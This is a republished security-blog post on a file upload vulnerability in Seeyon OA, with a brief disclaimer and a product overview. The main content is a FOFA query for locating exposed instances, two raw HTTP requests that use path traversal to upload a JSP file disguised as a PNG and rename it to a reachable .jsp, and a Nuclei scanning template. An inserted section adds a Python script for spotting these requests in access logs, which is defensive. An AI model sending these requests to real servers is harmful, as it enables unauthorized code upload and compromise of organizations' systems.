Seeyon OA (致远互联) fileUpload.do File Upload Vulnerability

admin, April 24, 2024, 21:49:30

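0x00 Reader Notice

Disclaimer: The information and methods in this article are provided solely for cybersecurity professionals for teaching and research purposes and must not be used for any illegal activity. Readers who use the content of this article for any unauthorized activity bear all legal responsibility and consequences themselves. This official account and the author accept no liability for any direct or indirect loss arising from it. Please strictly comply with the relevant laws and regulations.

0x01 Vulnerability Overview

Seeyon OA (致远OA) is an enterprise office automation product that provides workflow management, document management, collaborative work, knowledge management and other functions. It helps organizations digitize their office work and improve efficiency and collaboration. The system's fileUpload.do endpoint has a file upload vulnerability.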


0x02 Vulnerability Details

FOFA: app="FE-协作平台" || title="协同管理软件 V5.6SP1"

PoC:

POST /seeyon/autoinstall.do/../../seeyon/fileUpload.do?method=processUpload HTTP/1.1
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: multipart/form-data; boundary=skdHHhNHjhnUgerSexsksboundary
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)

--skdHHhNHjhnUgerSexsksboundary
Content-Disposition: form-data; name="type"

--skdHHhNHjhnUgerSexsksboundary
Content-Disposition: form-data; name="extensions"

png
--skdHHhNHjhnUgerSexsksboundary
Content-Disposition: form-data; name="applicationCategory"

--skdHHhNHjhnUgerSexsksboundary
Content-Disposition: form-data; name="destDirectory"

--skdHHhNHjhnUgerSexsksboundary
Content-Disposition: form-data; name="destFilename"

--skdHHhNHjhnUgerSexsksboundary
Content-Disposition: form-data; name="maxSize"

--skdHHhNHjhnUgerSexsksboundary
Content-Disposition: form-data; name="isEncrypt"

false
--skdHHhNHjhnUgerSexsksboundary
Content-Disposition: form-data; name="file1"; filename="1.png"
Content-Type: Content-Type: application/pdf

<% out.println("hello test");%>
--skdHHhNHjhnUgerSexsksboundary--


POST /seeyon/autoinstall.do/../../seeyon/privilege/menu.do HTTP/1.1
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)

method=uploadMenuIcon&fileid=7866719621757354789&filename=a123.jsp


Path: /seeyon/main/menuIcon/a123.jsp
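
The two requests and the resulting path above leave a recognizable trail in web access logs: dot segments in the raw path that resolve to fileUpload.do or privilege/menu.do, followed by a .jsp fetched from the menu icon directory. The detection sketch below is an added example, not part of the original post; it assumes combined-format access logs that record the raw request line, and the names GUARDED, ICON_DIR, classify and scan as well as the sample log lines are constructed for illustration.

```python
import posixpath
import re
from urllib.parse import unquote, urlsplit

# Endpoints the two requests on this page reach through the dot-segment prefix.
GUARDED = {"/seeyon/fileUpload.do", "/seeyon/privilege/menu.do"}
# Directory the page gives as the final location of the renamed file.
ICON_DIR = "/seeyon/main/menuIcon/"
# Combined log format: client, timestamp, "METHOD target HTTP/x.y", status.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) HTTP/[\d.]+" (\d{3})')


def classify(target):
    """Return a finding for one raw request target, or None if it looks benign."""
    path = unquote(urlsplit(target).path)  # decode %2e%2e before checking segments
    if ".." in path.split("/"):
        resolved = posixpath.normpath(path)
        if resolved in GUARDED:
            return "dot-segment access to " + resolved
        return "dot-segment path"
    if path.startswith(ICON_DIR) and path.lower().endswith((".jsp", ".jspx")):
        return "JSP requested from icon directory"
    return None


def scan(log_text):
    """Return (client, status, finding) for every suspicious line in an access log."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        finding = classify(target)
        if finding:
            hits.append((client, int(status), finding))
    return hits


# Constructed sample lines (documentation IP ranges), not taken from a real system.
SAMPLE_LOG = """\
198.51.100.7 - - [24/Apr/2024:21:40:01 +0800] "POST /seeyon/autoinstall.do/../../seeyon/fileUpload.do?method=processUpload HTTP/1.1" 200 312
198.51.100.7 - - [24/Apr/2024:21:40:03 +0800] "POST /seeyon/autoinstall.do/../../seeyon/privilege/menu.do HTTP/1.1" 200 20
198.51.100.7 - - [24/Apr/2024:21:40:05 +0800] "GET /seeyon/main/menuIcon/a123.jsp HTTP/1.1" 200 11
203.0.113.9 - - [24/Apr/2024:21:41:02 +0800] "POST /seeyon/fileUpload.do?method=processUpload HTTP/1.1" 200 300
"""

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

A 200 status on the icon-directory JSP hit, after the two dot-segment hits from the same client, is the combination that warrants checking the server's menuIcon directory for unexpected files.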


0x03 Nuclei

id: zhiyuanOA-fileUpload-fileupload

info:
  name: zhiyuanOA-fileUpload-fileupload
  author: unknown
  severity: high
  description: 致远互联 OA fileUpload.do 文件上传漏洞
  tags: zhiyuanOA,fileupload

http:
  - raw:
      - |
        POST /seeyon/autoinstall.do/../../seeyon/fileUpload.do?method=processUpload HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
        Content-Type: multipart/form-data; boundary=skdHHhNHjhnUgerSexsksboundary
        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)
        Content-Length: 854

        --skdHHhNHjhnUgerSexsksboundary
        Content-Disposition: form-data; name="type"

        --skdHHhNHjhnUgerSexsksboundary
        Content-Disposition: form-data; name="extensions"

        png
        --skdHHhNHjhnUgerSexsksboundary
        Content-Disposition: form-data; name="applicationCategory"

        --skdHHhNHjhnUgerSexsksboundary
        Content-Disposition: form-data; name="destDirectory"

        --skdHHhNHjhnUgerSexsksboundary
        Content-Disposition: form-data; name="destFilename"

        --skdHHhNHjhnUgerSexsksboundary
        Content-Disposition: form-data; name="maxSize"

        --skdHHhNHjhnUgerSexsksboundary
        Content-Disposition: form-data; name="isEncrypt"

        false
        --skdHHhNHjhnUgerSexsksboundary
        Content-Disposition: form-data; name="file1"; filename="AdsjkHjhggc_adf.png"
        Content-Type: Content-Type: application/pdf

        <% out.println("hello test");%>
        --skdHHhNHjhnUgerSexsksboundary--

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - AdsjkHjhggc_adf.png
      - type: word
        part: body
        words:
          - fileurls=fileurls
      - type: status
        status:
          - 200


Originally published on the WeChat official account 贫僧法号云空: Seeyon OA fileUpload.do File Upload Vulnerability
